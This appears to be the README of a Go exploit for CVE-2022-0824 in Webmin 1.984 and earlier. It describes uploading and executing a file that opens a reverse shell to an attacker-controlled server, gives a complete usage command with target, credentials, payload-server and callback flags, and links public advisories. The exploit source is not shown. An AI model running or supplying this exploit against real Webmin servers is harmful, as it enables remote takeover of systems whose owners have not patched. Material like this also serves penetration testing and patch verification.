RCE in Webmin <= 1.984
CVE-2022-0824 and CVE-2022-0829
This exploits a BAC vuln in Webmin to upload a malicious file, change the permissions on the file, and execute the file. The file, created in the makePayload function, is a reverse shell back to an attacker controlled server.
go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444
t -> target url
c -> creds for webmin
sl -> your local server IP and port to host your payload
s -> callback ip
p -> callback port
https://www.webmin.com/security.html
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://nvd.nist.gov/vuln/detail/CVE-2022-0824